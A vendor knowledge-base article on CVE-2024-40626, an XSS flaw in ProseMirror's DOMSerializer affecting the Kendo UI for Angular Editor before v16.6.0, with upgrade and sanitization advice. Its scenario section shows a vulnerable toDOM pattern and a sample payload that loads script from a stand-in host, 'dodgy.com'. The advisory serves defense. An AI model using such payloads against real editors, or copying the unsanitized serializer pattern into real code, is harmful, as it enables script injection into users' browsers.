Avoiding XSS Vulnerability in the ProseMirror Engine
Environment
| Product | Progress® Kendo UI® for Angular Editor |
Description
A critical security issue may affect the use of the Kendo UI for Angular Editor component, especially when its schema is customized using ProseMirror. This article details the Cross-Site Scripting (XSS) vulnerabilities and provides steps to mitigate the associated risks.
A Cross-Site Scripting (XSS) vulnerability, identified as CVE-2024-40626 vulnerability, exists in ProseMirror’s DOMSerializer. This vulnerability allows malicious actors to exploit applications by injecting scripts into the DOM when customizing the Editor’s schema with custom nodes or marks. Applications using Editor version before v16.6.0 are particularly at risk.
This KB article also answers the following questions:
- How to prevent XSS vulnerabilities in Angular Editor?
- How to secure custom ProseMirror schema from XSS attacks in Editor?
- What is the CVE-2024-40626 vulnerability in Editor, and how to fix it?
Problematic Scenario
When adding a custom node type to the Editor, failing to properly validate and sanitize input allows malicious users to craft payloads that, when serialized by ProseMirror, inject scripts into the DOM, potentially executing harmful code in users' browsers.
If you define a node or mark serializer function (e.g., a toDOM spec or a function passed to the DOMSerializer) that directly inserts a value from an attribute into an array used to describe the DOM structure.
node => ["span", node.attrs.label]An attacker can inject something like:
attrs: {label: ["script", {src: "//dodgy.com/script.js"}]}Into your document through a tampered API request. The DOMSerializer can emit arbitrary HTML tags, which may lead to malicious code being executed when the content is rendered by the browser.
Solution
- Upgrade the Kendo UI for Angular Editor package to 16.6.0 or later.
The XSS vulnerability has been fixed in version 16.6.0. To protect your application, upgrade to this version or any newer release. - Sanitize the input.
Even after upgrading, you need to continue following the best practices for sanitizing and validating all user input. If you have extended the editor’s schema with custom nodes, ensure the data is sanitized both when it's entered and when it's serialized into the DOM. - Review any custom nodes or marks you have added. Be especially cautious with features involving user-generated content. Handling untrusted input without proper sanitization can expose your application to XSS attacks.